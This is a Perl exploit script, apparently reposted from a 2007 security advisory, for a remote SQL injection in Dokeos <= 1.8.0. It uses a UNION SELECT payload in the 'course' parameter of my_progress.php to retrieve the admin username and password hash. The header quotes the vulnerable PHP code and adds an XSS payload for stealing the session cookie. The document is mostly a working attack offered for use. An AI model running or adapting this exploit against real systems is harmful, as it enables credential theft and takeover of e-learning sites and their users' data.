Dokeos <= 1.8.0 (my_progress.php course) Remote SQL Injection Exploit
来源: 作者:Silentz 发布时间:2007-05-25
#!/usr/bin/perl -w
################################################################################# # # # Dokeos <= 1.8.0 SQL Injection Exploit # # # # Discovered by: Silentz # # Payload: Admin Username & Hash Retrieval # # Website: # # # # Vulnerable Code (my_progress.php): # # # # if(isset($_GET['course'])) {$sqlInfosCourse = "SELECT course.code, # # course.title,course.db_name,CONCAT(user.firstname,' ',user.lastname ,' / ', # # as tutor_infos FROM $tbl_user as user,$tbl_course as course INNER# # JOIN $tbl_session_course as sessionCourse ON sessionCourse.course_code = # # course.code WHERE sessionCourse.id_coach = user.user_id AND course.code= # # '".$_GET['course']."'"; # # # # # # PoC:' # # UNION SELECT 0,password,0,username FROM user where user_id = '1'/* # # # # # # Subject To: magic_quotes_gpc set to off & have an already existant # # student/teacher account # # # # GoogleDork: Get your own! # # Shoutz: The entire w4ck1ng community # # # # Notes: To obtain SESSION_ID field you can log on and XSS yourself, like so: # # # # # # ImageManager/editor.php?img="><script>alert(document.cookie)</script> # # # # Also, the amount of XSS vulnerabilites in this application is truely # # unbelievable. # # # #################################################################################
use LWP::UserAgent; if (@ARGV < 2){ print "-------------------------------------------------------------------------\r\n"; print " Dokeos <= 1.8.0 SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "Usage: [PATH] [SESSION_ID]\r\n\r\n"; print "[PATH] = Path where Dokeos is located\r\n"; print "[SESSION_ID] = Session identifier of logged on user\r\n\r\n"; print "e.g. cjjjauie95inbmo5fim8m93vo1\r\n"; print "-------------------------------------------------------------------------\r\n"; print "\r\n "; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; exit(); }
$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $cookie = "$ARGV[1];"; $host = $ARGV[0] . "main/auth/my_progress.php?course=-999' UNION SELECT 0,password,0,username FROM user where user_id = '1'/*";
my @cookie = ('Cookie' => "dk_sid=$cookie;"); my $res = $b->get($host, @cookie);
$answer = $res->content; if ($answer =~ / - Coach : (.*?)<\/strong>/){ print "-------------------------------------------------------------------------\r\n"; print " Dokeos <= 1.8.0 SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "[+] Admin User : $1\n"; }
if ($answer =~/<strong>([0-9a-fA-F]{32}) - Coach :/){ print "[+] Admin Hash : $1\n"; print "-------------------------------------------------------------------------\r\n"; print "\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; }
else { print "\nExploit Failed...\n"; }
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